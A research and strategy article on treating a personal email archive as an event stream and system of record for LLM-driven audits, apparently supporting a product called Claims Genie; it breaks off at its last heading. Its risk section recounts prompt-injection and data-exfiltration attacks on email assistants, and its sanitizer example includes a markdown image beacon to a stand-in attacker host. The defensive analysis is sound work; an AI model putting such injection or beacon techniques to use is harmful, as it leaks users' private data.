Email as an Event Stream and a System of Record
The frame
Joe's intuition: a personal email archive is two things at once.
- An event stream — a time-ordered log of everything that happened to a person. Every charge, delivery, deadline, breach notice, flight delay, price increase, and appointment arrives in the inbox stamped with a time. Read end to end, it is the closest thing most people have to a complete chronicle of their adult life.
- A system of record — the authoritative database of who the person is: their names and addresses, their accounts, their commitments, their relationships, their identifiers. When a dispute arises — "did I cancel that?", "what's my confirmation number?", "did they actually refund me?" — the inbox is the ground truth people reach for. Not because it was designed to be; because it is the only store that captured everything by default.
The second half of Joe's intuition is the operational one: because the inbox holds thousands of discrete facts, there are thousands of discrete tasks latent in it — refunds to chase, subscriptions to kill, deadlines to catch, money to claim. Almost none of them get done. Not because they aren't worth doing, but because the cost of doing any single one — finding it, understanding it, acting on it — has always exceeded what that one task is worth on its own. You could, in principle, sit down and run an audit of 1,000 or 5,000 distinct jobs against your inbox. Nobody does. The arithmetic never closed.
This article argues that the arithmetic just closed. The idea is old — it has a clean 80-year intellectual lineage. What is new, and new only since roughly 2023, is that a language model can read and reason about a single email for a fraction of a cent. That collapses the per-task cost below the value of the marginal task, and a whole-inbox audit becomes a positive-expected-value computation for the first time in history. Claims Genie is one task type in that audit. The inbox-agent system plan is the generalization. This article is the research backing for both.
A short history: the idea is 80 years old
The framing Joe arrived at independently has been arrived at, in pieces, by computer scientists since 1945. Two intellectual lineages developed it — and, tellingly, they barely cited each other.
1945: Vannevar Bush, "As We May Think". The Memex: a person's total record, associatively linked and queryable. The origin point.
Stream lineage (capture and navigate):
- 1994: Steve Mann, 24/7 wearable capture
- 1996: Freeman & Gelernter, Lifestreams: a time-ordered document stream replaces the file/folder desktop
- 2001: Bell & Gemmell, MyLifeBits: total capture into a single personal SQL database ("Memex fulfilled")
- 2007: Wolf & Kelly, Quantified Self
Record lineage (re-find and track):
- 1996: Whittaker & Sidner, "Email Overload": email is not a messaging app, it is a habitat where people track tasks, archive, and manage commitments
- 2003: Dumais et al., "Stuff I've Seen": one unified index over everything a person has encountered
- 2003: Bellotti et al., "Taking Email to Task"
- 2007: William Jones, Personal Information Management becomes a named discipline
- 2016: Bergman & Whittaker, "The Science of Managing Our Digital Stuff"
2023+: LLMs collapse the two lineages. The same raw inbox answers both stream questions ("what happened, in order?") and record questions ("who am I, what do I owe, what am I owed?"), with no schema, no manual filing, no per-sender parser.
Vannevar Bush, "As We May Think" (The Atlantic, July 1945). Bush proposed the Memex: a device in which "an individual stores all his books, records, and communications... mechanized so that it may be consulted with exceeding speed and flexibility... an enlarged intimate supplement to his memory." Bush had the framing exactly right and the bottleneck exactly wrong. He assumed the hard problem was the storage and retrieval machinery. The hard problem turned out to be semantic understanding of the content — and that is precisely the part LLMs now solve.
Lifestreams — Eric Freeman & David Gelernter, Yale (1996). Freeman and Gelernter proposed throwing out the file/folder/desktop metaphor entirely and replacing it with a single chronologically-ordered stream of every document a person ever created or received ("Lifestreams: A Storage Model for Personal Data," ACM SIGMOD Record 25:1, March 1996; Freeman's PhD thesis, Yale, 1997). Their core claim — that time-order is the natural index for personal data, because people remember when things happened more reliably than where they filed them — is correct and still underappreciated. It is also exactly how Gmail's "all mail + search" model works in practice. Lifestreams is the direct ancestor of "email as event stream." Its limitation: it had no semantic understanding, so the user still had to hand-build every filter. An LLM is the filter.
MyLifeBits (Gordon Bell & Jim Gemmell, Microsoft Research, 2001–2009). Bell, a computing legend (he led development of DEC's VAX), made himself the experimental subject of a total-capture project: every document, photo, email, web page, phone call, and meeting into one personal SQL database. The 2006 Communications of the ACM paper is titled, with no hedging, "MyLifeBits: A Personal Database for Everything." The project explicitly positioned itself as fulfilling Bush's Memex. This is the cleanest prior statement of "email as system of record," except that they tried to build the database deliberately, with custom capture hardware. The accidental version already exists in everyone's Gmail. What MyLifeBits lacked, and what Sellen & Whittaker ("Beyond Total Capture," CACM 2010) later identified as the fatal gap in total capture, was curation: a giant captured archive that nobody can usefully query is a junk drawer. LLMs are the curation layer that was missing.
Stuff I've Seen — Susan Dumais et al., Microsoft Research (SIGIR 2003). A unified index over everything a user had encountered — email, web, documents, calendar — with the insight that contextual cues (who sent it, when, what thread) make personal-archive search fundamentally different from web search. Deployed to 230+ Microsoft employees. Still keyword-based; the question it could not answer was the semantic one — "find every email where someone made me a commitment with a deadline." That is now a one-line prompt.
Email-as-habitat — the PIM lineage (1996–2016). Whittaker & Sidner's "Email Overload" (CHI 1996) is the founding empirical paper: they studied 20 users' archives and found email had been overloaded far past its design — it was being used as a task manager, a document archive, a contact database, and a commitment tracker. Ducheneaut & Bellotti sharpened the metaphor in 2001: email is a habitat, the place knowledge workers actually live. Bellotti et al.'s "Taking Email to Task" (CHI 2003) built a client that treated the inbox explicitly as an action queue. Whittaker, Bellotti & Gwizdka (CACM 2006) documented that the average user's folder count grew from 47 (1996) to 133 (2006) — the inbox visibly metastasizing into a personal database. William Jones made Personal Information Management a named discipline (Keeping Found Things Found, 2007); Bergman & Whittaker wrote the field's synthesis (The Science of Managing Our Digital Stuff, MIT Press, 2016).
The PIM literature treats "email is the de facto personal system of record" as so obvious it states it as background, never as a finding. That is the tell. Everyone who has studied how people actually use email already knows it is their database. Nobody could do anything useful with that fact at scale, because the only tool for reading 50,000 emails was 50,000 units of human attention.
The synthesis nobody reached. The stream lineage and the record lineage developed in near-isolation. What neither anticipated: an LLM sitting on a raw inbox collapses the distinction. The same corpus answers "what happened to me, in order?" (stream) and "what is my current address / what did I commit to / what am I owed?" (record) — with no schema, no user-built filing structure, and no per-sender parser. Joe's two-primitives framing is the synthesis the literature never wrote down.
What "LLMs on email" actually means in 2026 — and what it conspicuously does not do
The space of products that point AI at email is real and crowded. But it is worth being precise about what they do, because there is a large, obvious gap, and Claims Genie / the inbox-agent plan sits squarely in it.
| Product | What the AI does over the corpus | Corpus access | Autonomous action? |
|---|---|---|---|
| Shortwave | Full RAG: bi-encoder retrieval + GPU cross-encoder re-rank + LLM synthesis; natural-language Q&A over entire history; thread summary; voice-matched drafts | Full inbox, Gmail OAuth | Draft only |
| Superhuman | Voice-learned drafting, semantic search, AI auto-labels, auto-archive, follow-up nudges | Full inbox, OAuth | Auto-archive / auto-label |
| Gmail (Gemini) | Summarize thread, "Help me write", inbox prioritization, cross-inbox Q&A (paid tier), per-email summary cards | Full inbox, on-Google | Assistive only |
| Notion Mail | LLM classification + auto-sort into topic folders | Full inbox, OAuth | Auto-sort |
| Fyxer / Serif | Triage into buckets, voice-learned reply drafts, meeting transcription | Full inbox, OAuth | Label / categorize |
| SaneBox | Header-only behavioral triage (does not read content) | Headers only, IMAP | Move to folders |
| Apple Intelligence | On-device thread summary + priority messages | Device-local | None |
| MS 365 Copilot | Summarize, draft, cross-Graph Q&A, RSVP automation | Inbox + full M365 Graph | RSVP automation |
| Lindy | Configurable autonomous agent: triage, draft, schedule, extract action items, send | Full inbox, OAuth | Yes — including send |
Every product in that table optimizes the same loop: help the user process incoming mail faster — read it, triage it, summarize it, reply to it. That is the "email overload" problem the 1996 PIM literature named, and 30 years later it is still what the entire industry is building for. It treats the inbox as a flow to be drained.
Almost nobody treats the inbox as a corpus to be mined. The distinction is the whole point:
- Draining the flow asks: what is the fastest path to inbox zero?
- Mining the corpus asks: what is true about this person, and what is owed to or by them, given everything that ever arrived?
The handful of products that mine do exactly one vein and stop. TripIt parses travel confirmations: one document type, hand-written per-airline parsers since ~2011. Rocket Money detects subscriptions, but from bank transactions rather than email, so it never sees the trial start date or the price-change history that lives only in the inbox. Unroll.me enumerates newsletter senders; infamously, while Slice Intelligence owned it (2017), it monetized the receipt data by selling Lyft ride receipts to Uber, the canonical cautionary tale of "we needed broad inbox access for feature X, so we sold everything else." Have I Been Pwned checks an address against breach lists, but cannot tell you which of your accounts was the leak source. Each was built when per-email reasoning was expensive, so each could only justify the engineering for one high-uniformity document type. None generalizes. Is there a regex for "did this person promise to introduce Alice to Bob and then never do it"? No, there is not, and that is the point.
The research benchmarks confirm both the opportunity and the ceiling. EnronQA (arXiv:2505.00263, May 2025 — 103,638 emails, 528,304 Q&A pairs over 150 real inboxes) found GPT-4o + BM25 retrieval answers direct questions over a personal email corpus at 81.2% accuracy — strong, genuinely useful, and not reliable enough to act on unreviewed. WorkBench (arXiv:2405.00823, 2024 — 690 realistic workplace tasks) found GPT-4 completed 43% of multi-step email/calendar tasks, and warned the failures were not benign: agents sent email to the wrong person. The capability is real. The reliability is mid. That gap is a design constraint, not a disqualifier — and it dictates the autonomy ladder discussed below.
The unit economics: why the audit is rational now and was not in 2022
This is the load-bearing section. The thesis is not "LLMs are smart enough." It is "LLMs are cheap enough" — the cost of running one small reasoning job against one email has fallen below the value of the marginal task in a 5,000-task audit.
The price collapse, quantified. GPT-4-class capability cost ~$36 per million input tokens at launch (March 2023). By 2026 the same capability is available below ~$0.40 per million — roughly a 90× drop in under three years. Epoch AI's analysis puts the trend at ~10× per year, faster than Moore's Law; a16z calls it "LLMflation." For email-class work the relevant model is a small fast one — Claude Haiku 4.5 at ~$0.80 / $4.00 per million input/output tokens; GPT-4o-mini at $0.15 / $0.60.
Cost to read one email. A typical email with thread context is 1,000–3,000 tokens. Classifying one email and extracting structured JSON from it costs on the order of $0.0002–$0.0006 at GPT-4o-mini rates (1,000–3,000 input tokens at $0.15 per million, plus a short JSON reply): a few hundredths of a cent. At the Haiku rates quoted above the same job costs roughly $0.001–$0.003, still a fraction of a cent. Schema-constrained generation (pass a Pydantic/JSON schema, get reliable structured output back) makes this a routine, boring operation rather than a research project.
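As a rough illustration of what schema-constrained extraction buys, the sketch below validates a model's JSON reply against a fixed shape and rejects anything off-schema. It uses only the standard library and calls no real API. The field names, the category set, and the `parse_email_facts` helper are assumptions made up for this example, not part of Claims Genie or any provider SDK.

```python
import json
from dataclasses import dataclass
from typing import Optional

# Hypothetical category set for illustration; the article does not define one.
ALLOWED_CATEGORIES = {"receipt", "subscription", "refund", "deadline", "other"}
EXPECTED_KEYS = {"category", "merchant", "amount_usd", "due_date"}


@dataclass(frozen=True)
class EmailFacts:
    category: str
    merchant: Optional[str]
    amount_usd: Optional[float]
    due_date: Optional[str]  # ISO 8601 date string, or None


def parse_email_facts(raw_model_output: str) -> EmailFacts:
    """Validate a model's JSON reply; raise ValueError if it is off-schema."""
    try:
        data = json.loads(raw_model_output)
    except json.JSONDecodeError as exc:
        raise ValueError(f"not valid JSON: {exc}") from exc
    if not isinstance(data, dict) or set(data) != EXPECTED_KEYS:
        raise ValueError("reply must be an object with exactly the expected keys")
    category = data["category"]
    if not isinstance(category, str) or category not in ALLOWED_CATEGORIES:
        raise ValueError(f"unknown category: {category!r}")
    amount = data["amount_usd"]
    # bool is a subclass of int in Python, so exclude it explicitly.
    if amount is not None and (isinstance(amount, bool) or not isinstance(amount, (int, float))):
        raise ValueError("amount_usd must be a number or null")
    for key in ("merchant", "due_date"):
        if data[key] is not None and not isinstance(data[key], str):
            raise ValueError(f"{key} must be a string or null")
    return EmailFacts(
        category=category,
        merchant=data["merchant"],
        amount_usd=None if amount is None else float(amount),
        due_date=data["due_date"],
    )
```

A reply that fails validation can be retried or routed to review. Either way, downstream code only ever sees one shape.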
Cost to audit a whole life. A 10-year inbox at average density is ~8,000 stored messages; a heavy user runs 50,000–200,000.
| Inbox size | Full classify + extract sweep (at $0.0002–$0.0006 per email) |
|---|---|
| 8,000 emails | $1.60 – $4.80 |
| 100,000 emails | $20 – $60 |
Run a stronger model on just the flagged 5% that need judgment, and add ~$1 for the typical inbox. Depending on the model, a typical whole-life audit costs on the order of $5–$15 in inference, once, and a heavy 100,000-message archive scales linearly into the tens of dollars. These figures follow directly from published API prices and the per-email token counts above; the only free variables are inbox size and model choice.
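The sweep arithmetic can be reproduced in a few lines. This is a sketch under stated assumptions: the per-million-token prices are the ones quoted in the text, the 1,000–3,000 input-token range is the article's, and the 100 output tokens per email is an assumed size for a short JSON reply.

```python
def sweep_cost_usd(n_emails, tokens_in, tokens_out, price_in_per_m, price_out_per_m):
    """Inference cost in USD of one classify + extract pass over n_emails."""
    per_email = (tokens_in * price_in_per_m + tokens_out * price_out_per_m) / 1_000_000
    return n_emails * per_email


# (input, output) prices per million tokens, as quoted in the text.
PRICES = {"GPT-4o-mini": (0.15, 0.60), "Haiku-class": (0.80, 4.00)}
OUTPUT_TOKENS = 100  # assumption: one short JSON object per email

for model, (p_in, p_out) in PRICES.items():
    for n_emails in (8_000, 100_000):
        low = sweep_cost_usd(n_emails, 1_000, OUTPUT_TOKENS, p_in, p_out)
        high = sweep_cost_usd(n_emails, 3_000, OUTPUT_TOKENS, p_in, p_out)
        print(f"{model:12s} {n_emails:>7,} emails: ${low:,.2f} to ${high:,.2f}")
```

Cost is linear in both inbox size and tokens per email, so model choice and thread-context length move the total more than anything else. Under these assumptions the per-email figure in the text is closest to GPT-4o-mini pricing, and Haiku-class pricing comes out several times higher.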
What the audit replaced. Before 2023 there were three ways to extract structured meaning from an email, and all three priced the audit out:
| Method | Cost per email | Why it failed the audit |
|---|---|---|
| Human attention | 10–30 sec, ≈ $0.02–$0.07 at near-minimum wage | 8,000 emails at 30 sec each = ~66 hours = $560+. Nobody does 66 hours of unpaid forensic inbox work for a diffuse payoff. |
| Hand-written parser | ~$0 to run, weeks to build | Works only on known-format senders; breaks on a layout change; needs per-sender engineering. Justifiable for one uniform document type (TripIt), never for 5,000 heterogeneous tasks. |
| Pre-LLM ML classifier | cheap to run | Needs labeled training data per category; breaks on out-of-distribution senders. |
| Zero/few-shot LLM (2023+) | $0.0002–$0.0006 | Works on any sender, any format, any language, no training data, returns structured JSON. |
The shape of the shift. The old world had a hard cost floor under every task: the cheapest possible unit of "understand this email and decide if it's worth acting on" was a unit of human attention, and human attention is never free. That floor meant only crisis-grade tasks cleared the bar — the notice that screamed loudly enough to demand action got done; the other 4,990 quietly worth $3–$200 each did not. The LLM removes the floor. When the marginal task costs $0.0005 to evaluate, you stop triaging which tasks are worth checking and just check all of them. The audit stops being a project and becomes a sweep.
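The "floor" argument is an expected-value comparison, which the sketch below makes explicit. The LLM check cost is the $0.0005 figure from the text. The human check cost assumes about 30 seconds of attention at roughly $8.50/hr, in line with the $560 for 66 hours figure. The hit probability and the payoff are hypothetical values chosen only to illustrate the sign flip.

```python
def expected_net_value(p_actionable: float, value_usd: float, check_cost_usd: float) -> float:
    """Expected gain from checking one email: chance of a hit times payoff, minus check cost."""
    return p_actionable * value_usd - check_cost_usd


def break_even_probability(value_usd: float, check_cost_usd: float) -> float:
    """Smallest hit probability at which checking is worth the cost."""
    return check_cost_usd / value_usd


LLM_CHECK_COST = 0.0005  # per-email evaluation cost quoted in the text
HUMAN_CHECK_COST = 0.07  # assumption: ~30 s of attention at roughly $8.50/hr

# Hypothetical marginal task: a 1-in-100 chance that the email hides a $3 recovery.
p_hit, value = 0.01, 3.00

for label, cost in (("LLM", LLM_CHECK_COST), ("human", HUMAN_CHECK_COST)):
    net = expected_net_value(p_hit, value, cost)
    threshold = break_even_probability(value, cost)
    print(f"{label:5s} net EV per email: {net:+.4f} USD, break-even p: {threshold:.5f}")
```

With these illustrative numbers the same task is worth checking by model and not by hand. That is the sense in which the sweep replaces triage.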
This is also why the business model works. The aggregate value latent in one ordinary American adult's inbox — across unclaimed property ($70B in US state escheatment pools, average claim $1,610), unfiled class-action claims (claim rates of 9% or worse), zombie subscriptions ($204/yr average forgotten spend), forfeited FSA funds ($4.5B/yr nationally), unredeemed rebates and gift cards ($21B+ in gift cards alone) — runs to hundreds, often thousands, of dollars. Spending $10 of inference to surface that is a rounding error. Claims Genie's pricing thesis — we get paid only after the user gets paid — is only viable because the scan cost is negligible against the recovery.
The unbuilt task list: what a 5,000-job inbox audit actually contains
Joe's "you could go through and do a thousand or five thousand different tasks" is not rhetorical. Here is the taxonomy, with the concrete jobs and the real numbers behind them. The marks follow the inbox-agent plan: ★ recovers a concrete dollar figure (fits performance pricing), ◐ saves money (priceable as a cut of savings), ○ real value but no payout to clip.
1. Money already yours — recovery ★
The inbox holds the proof and the event; the task is find proof + detect event + do paperwork.
- Class-action settlements — current Claims Genie product. ~$42B in settlements reached in 2024; claim rates of 9% or less, dropping to ~3% on email-only notice, with some consumer cases under 0.03%.
- Unclaimed property — $70B held by US states, ~1 in 7 Americans, average claim $1,610. The signal is indirect: the inbox names the employers, banks, and utilities that may have escheated property on the user's behalf.
- Lost / orphaned retirement accounts — multi-employer 401(k) scatter. Joe's own inbox (per the inbox-agent plan) shows 401(k)s at two staffing employers across Fidelity and Milliman, 6+ Fidelity account numbers, a $45,429 rollover — a textbook consolidation case sitting in plain sight.
- Forgotten balances — gift cards ($21B+ unredeemed nationally), store credit, loyalty points (McKinsey estimated 30 trillion unredeemed airline miles; some programs redeem only 8%).
- Refund reconciliation — "advance refund" emails ("we may re-charge if not verified"), flight refund tracking (did all three Alaska refund files actually land?), flight delay/cancellation compensation eligibility.
- Recalled-product refunds — match CPSC/NHTSA recall notices against actual purchase confirmations. Only ~1 in 5 Americans know they own a recalled product.
- Rebates ($500M–$2.4B/yr unredeemed), fee refunds (overdraft/ATM/late), deposits owed back (26% of renters have lost a deposit), warranty claims (55% of extended warranties bought are never used), unfiled FSA/HSA reimbursements ($4.5B/yr forfeited), sign-up bonuses not credited.
2. Money quietly flowing out — leak-stopping ◐
- Subscription cancellation — the killer signal. Average American spends $219/mo on subscriptions but believes it's $86; 42% admit to a fully-forgotten-but-still-charging subscription. Joe's own inbox shows 25–35 active paid subscriptions and him manually fighting Artlist support for a refund — doing this job by hand, today.
- Duplicate / overlapping services — four overlapping AI assistants, four overlapping video services.
- Price-increase interception — catch the "your plan is changing to $X" email before autopay fires.
- Free-trial → paid interception — 70% of people have forgotten to cancel a trial.
- Unused-value detection — subscriptions with no usage signal for 90+ days.
- Bill negotiation, insurance overpayment, auto-renewal interception.
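The unused-value check in the list above reduces to a date comparison once charge and usage signals have been extracted. The sketch below is one possible shape, assuming each extracted event is a `(service, kind, day)` tuple with `kind` either `"charge"` or `"usage"`. The 35-day billing window is an assumption that fits monthly billing and would miss annual plans; the service names in the usage example are invented.

```python
from datetime import date


def unused_subscriptions(events, today, idle_days=90, billing_window_days=35):
    """Return services charged recently that show no usage signal for idle_days or more."""
    latest = {}
    for service, kind, day in events:
        key = (service, kind)
        if key not in latest or day > latest[key]:
            latest[key] = day

    flagged = []
    for service in sorted({service for service, _, _ in events}):
        last_charge = latest.get((service, "charge"))
        last_usage = latest.get((service, "usage"))
        recently_charged = (
            last_charge is not None
            and (today - last_charge).days <= billing_window_days
        )
        idle = last_usage is None or (today - last_usage).days >= idle_days
        if recently_charged and idle:
            flagged.append(service)
    return flagged


# Hypothetical extracted events.
events = [
    ("StreamCo", "charge", date(2026, 3, 1)),
    ("StreamCo", "usage", date(2025, 11, 1)),
    ("CloudNotes", "charge", date(2026, 3, 5)),
    ("CloudNotes", "usage", date(2026, 3, 10)),
    ("OldGym", "charge", date(2025, 6, 1)),
]
print(unused_subscriptions(events, today=date(2026, 3, 15)))
```

The absence of a usage email is weak evidence, since many services never send one. A flag from this check is therefore a prompt for review, not a cancellation decision.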
3. Never miss a deadline — vigilance ○
Bill due dates, return windows, warranty/rebate/trial/gift-card expirations, registration/passport/license renewals, business-entity compliance (the biennial-statement obligation for an incorporated entity), legal and court notices, tax deadlines.
4. Identity & exposure mapping ○
- Complete account inventory — every "welcome to X" email, deduplicated, first-seen dated. A 25-year email user has opened 500–2,000 accounts.
- Breach exposure — 2025 saw 3,322 US data compromises, 278M+ people affected; map which specific accounts were the leak source (the thing HIBP cannot do).
- Accounts at acquired or defunct companies, accounts never properly closed, payment-card exposure map (which companies store a card directly), the full marketing opt-in ledger.
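The account inventory described above ("deduplicated, first-seen dated") is a small aggregation once welcome emails have been identified. A minimal sketch, assuming the classifier has already produced `(sender_address, received_date)` pairs. Deduplicating on the raw sender domain is a simplifying assumption, and a production version would need to fold subdomains and third-party mail services into one account.

```python
from datetime import date


def account_inventory(welcome_emails):
    """Map each sender domain to the earliest date a welcome email arrived, oldest first."""
    first_seen = {}
    for sender, received in welcome_emails:
        domain = sender.rsplit("@", 1)[-1].strip().lower()
        if domain not in first_seen or received < first_seen[domain]:
            first_seen[domain] = received
    return dict(sorted(first_seen.items(), key=lambda item: item[1]))


# Hypothetical input using reserved example domains.
emails = [
    ("welcome@shop.example.com", date(2015, 3, 1)),
    ("no-reply@Shop.Example.com", date(2012, 7, 9)),
    ("hello@bank.example.org", date(2019, 1, 2)),
]
for domain, first in account_inventory(emails).items():
    print(domain, first.isoformat())
```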
5. Tax & financial artifacts ★/○
Charitable-donation receipts (the most commonly disqualified deduction — and every donation platform emails an exact-amount confirmation), 1099/W-2/1099-K arrival tracking (flag the form that never showed), cost-basis records for sold assets (often the only surviving record for pre-2014 or defunct-exchange holdings), business expenses buried in personal mail, HSA-eligible receipts paid out of pocket and still reimbursable.
6. Relationships & social ○
Explicit commitments made in threads ("I'll send that Friday", "let's grab coffee", "I'll introduce you to —"), unanswered mail from high-frequency contacts, birthdays/anniversaries mentioned in passing, RSVPs never sent, introductions made but never followed up, contacts gone cold after a warm thread.
7. Health ★/○
Provider relationship catalog, EOB-vs-invoice reconciliation (duplicate and surprise bills are common), prescription/refill history, lab-result notifications with no follow-up appointment within 30 days (a possibly-ignored abnormal result), open-enrollment confirmations, the 60-day COBRA window after a job change.
8. Consumer protection & product lifecycle ★/○
Cross-reference every purchase confirmation against CPSC and NHTSA recall databases; product-registration reminders; defect class memberships; "firmware update required for safety" notices for connected devices.
Does "5,000 tasks" hold? For a 10-year inbox, a conservative count:
| Category | Extractable data points | Items warranting action |
|---|---|---|
| Money / claims | 800–1,200 | 40–180 |
| Subscriptions | 50–200 | 50–200 |
| Deadlines / obligations | 300–600 | 30–100 |
| Identity / exposure | 500–2,000 | 50–300 |
| Tax artifacts | 200–500 | 20–50 |
| Relationships | 1,000+ | 20–100 |
| Health | 100–400 | 10–50 |
| Product lifecycle | 200–500 | 10–50 |
| Total | ~3,500–6,500 | ~250–1,000 |
The "thousands of tasks" claim is, if anything, conservative — and it counts only decision tasks, not the background enrichment (account graph, relationship graph, cost-basis ledger) that has standalone value. Joe's instinct that "a person might not think to do or might put off" most of these is exactly right: every one of them is individually too small to schedule and too tedious to enjoy, which is the precise profile of work to hand to an agent.
The risk surface: pointing an LLM at a whole inbox is not free
The thesis is sound, but the inbox is the most dangerous corpus to point an agent at, for five independent reasons. None of them kills the idea. All of them shape the architecture.
1. Prompt injection — the inbox is an attacker-controlled input channel. This is the central, structural risk. Simon Willison's "lethal trifecta" names the condition precisely: an agent that has (a) access to private data, (b) exposure to untrusted content, and (c) the ability to exfiltrate is exploitable — and an inbox agent has all three by design. The attacks are not theoretical:
- Gemini-in-Gmail hidden-text phishing (Mozilla 0din, 2024–2025): an attacker emails white-on-white, zero-font-size text wrapped in <admin> tags; when the victim clicks "summarize," Gemini faithfully renders the attacker's fake "your password is compromised, call this number" warning. No link, no attachment, nothing a spam filter catches.
- EchoLeak / CVE-2025-32711 (Aim Labs, June 2025, CVSS 9.3): a single email, zero clicks, exfiltrated M365 Copilot users' Outlook/OneDrive/SharePoint data. The injection was phrased in plain natural language to slip past Microsoft's injection classifier, and the data left via a markdown-image URL the client auto-fetched.
- GeminiJack (Noma, 2025): a poisoned shared doc/email caused Gemini Enterprise to exfiltrate across Gmail, Calendar, and Docs at once.
- Morris II (2024): the first self-propagating prompt-injection worm, using email injection as its access vector.
NIST calls indirect prompt injection "generative AI's greatest security flaw"; it is #1 on the 2025 OWASP LLM Top 10. Classifier defenses keep losing to natural-language obfuscation.
2. Exfiltration paths. Three demonstrated vectors: markdown-image auto-fetch (data rides in the URL query string — EchoLeak, GeminiJack), agent tool calls to attacker URLs, and the agent itself sending mail out. This is why the read-only-scope choice matters: gmail.readonly (Claims Genie's scope) eliminates the "agent emails data out" and "agent deletes evidence" paths outright. It does not close the markdown-beacon path — that has to be closed by sanitizing the agent's output before anything renders it.
3. The inbox is a lossy and adversarial system of record. This is the reliability problem and it has no clean technical fix because it is a property of the data, not the agent. Contact/profile data decays 20–30% per year. Most people have 2–4 inboxes, so any single one is a partial view — and the agent will not know what it is missing or calibrate its confidence to its actual recall. A phishing email imitating Chase looks more "transactional" than real Chase marketing. An LLM that extracts "your address is 123 Main St" from a 2014 Amazon receipt and pre-fills a 2026 form has made a confident, plausible, wrong decision. The 81.2% EnronQA ceiling is the quantified version of this: roughly one in five answers is wrong, and the model cannot tell you which one.
4. The structured profile is more dangerous than the raw mbox. This is the aggregation risk, and it is the subtle one. A raw inbox is large, messy, and slow for an attacker to exploit. The clean JSON profile an LLM produces — full name, prior names, current and prior addresses, PayPal/Venmo/Zelle handles, account IDs, relationships — is immediately actionable for identity theft, account takeover, and SIM-swapping. The UK NCSC codifies this as a named security principle ("avoid putting too much sensitive data together"). The uncomfortable corollary: the most valuable exfiltration target in the system is the agent's own output, not its input. That is a direct argument for the inbox-agent plan's hard exclusions (never store SSN, bank routing, card PAN, government IDs, credentials — already in the Claims Genie CLAUDE.md) and for keeping the structured store encrypted at rest (SQLCipher is already live on Prometheus).
5. Provider policy is a real constraint, not a footnote. Google's API Services User Data Policy and the 2023 Workspace generative-AI update are explicit: Gmail data may be used only for the user-facing feature the user authorized; it may not train models beyond a per-user personalization; it may not be transferred or sold to third parties, even aggregated, even with consent. Google's scope classification lists both gmail.readonly and gmail.modify as "Restricted" scopes: each requires OAuth verification with explicit disclosure, and an app that stores or transmits the data on its own servers must also pass a recurring paid CASA security assessment. The existing data-sovereign-email.md research article in this repo covers the downstream consequence: the Limited Use policy is why a user cannot share in the value of their own Gmail-derived data while that mail lives at Google, and why true data sovereignty starts at the mailbox.
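The hard exclusions named in item 4 can be backed by a redaction pass that runs before any extracted text is persisted. The sketch below covers only two of the excluded classes, US SSNs in the common dashed format and card PANs, and it is pattern-based, which is an assumption of this example rather than the plan's stated mechanism. Candidate card numbers are confirmed with the Luhn checksum so that order numbers of similar length are left alone. Treat it as a backstop, not a guarantee.

```python
import re

SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
# 13 to 19 digits, optionally separated by single spaces or hyphens.
PAN_CANDIDATE_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right, sum, test mod 10."""
    total = 0
    for index, char in enumerate(reversed(digits)):
        value = int(char)
        if index % 2 == 1:
            value *= 2
            if value > 9:
                value -= 9
        total += value
    return total % 10 == 0


def redact(text: str) -> str:
    """Mask dashed SSNs and Luhn-valid card numbers; leave other digit runs untouched."""
    text = SSN_RE.sub("[REDACTED-SSN]", text)

    def mask_if_card(match):
        digits = re.sub(r"\D", "", match.group())
        return "[REDACTED-PAN]" if luhn_valid(digits) else match.group()

    return PAN_CANDIDATE_RE.sub(mask_if_card, text)


# 4111 1111 1111 1111 is a widely used test card number, not a real account.
print(redact("SSN 123-45-6789, card 4111 1111 1111 1111, order 1234567890123456"))
```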
Mitigations that actually work today, in rough order of leverage: read-only scopes; on-device / local inference (the inbox-agent plan's choice to run the digest/classify step on a local DGX Spark model means raw inbox text never leaves the box for those steps); the dual-LLM pattern (a privileged planner that never sees untrusted content + a quarantined reader that has no tools; Willison, 2023; DeepMind's CaMeL, 2025, is the capability-enforced descendant, completing ~67% of AgentDojo benchmark tasks with provable security); markdown/link sanitization of agent output; and human-in-the-loop gates on any irreversible action. The unsolved residue: injection-classifier defenses lose to novel phrasing, and the lossy-data problem has no fix at all. It can only be surfaced (show provenance and a confidence/staleness flag on every extracted fact) rather than eliminated.
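The markdown/link sanitization step can be sketched as a filter applied to agent output before anything renders it. This is a deliberately crude illustration under stated assumptions: it uses regular expressions, not a real markdown parser, the `sanitize_agent_output` name and the allowlist parameter are hypothetical, and URLs containing parentheses are not handled. It removes the things a client might auto-fetch (inline images, raw HTML tags, reference-style link definitions) and flattens links to hosts outside the allowlist into plain text.

```python
import re
from urllib.parse import urlparse

HTML_TAG_RE = re.compile(r"<[^>]+>")  # raw HTML such as <img src=...>
REF_DEF_RE = re.compile(r"^[ \t]*\[[^\]]+\]:[ \t]*\S+.*$", re.MULTILINE)  # [ref]: url
IMAGE_RE = re.compile(r"!\[[^\]]*\]\([^)]*\)")  # ![alt](url)
LINK_RE = re.compile(r"\[([^\]]*)\]\(([^)]*)\)")  # [label](url)


def _host(url: str) -> str:
    try:
        return urlparse(url.strip()).hostname or ""
    except ValueError:  # malformed URL: treat as untrusted
        return ""


def sanitize_agent_output(markdown: str, allowed_hosts: frozenset = frozenset()) -> str:
    """Drop auto-fetchable content and flatten links to non-allowlisted hosts."""
    text = HTML_TAG_RE.sub("", markdown)
    text = REF_DEF_RE.sub("", text)
    # Images are removed unconditionally so nothing is fetched at render time.
    text = IMAGE_RE.sub("(image removed)", text)

    def keep_or_flatten(match):
        label, url = match.group(1), match.group(2)
        return match.group(0) if _host(url) in allowed_hosts else label

    return LINK_RE.sub(keep_or_flatten, text)


raw = (
    "Summary ![x](https://evil.example/p?d=secret) see "
    "[docs](https://docs.example.com/a) and [click](https://evil.example/b)"
)
print(sanitize_agent_output(raw, frozenset({"docs.example.com"})))
```

Removing images outright, with no attempt to judge them, is the design choice that matters here. The beacon path needs no user action, so the safe default is that agent output never contains anything the renderer fetches on its own.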
What this means for Claims Genie
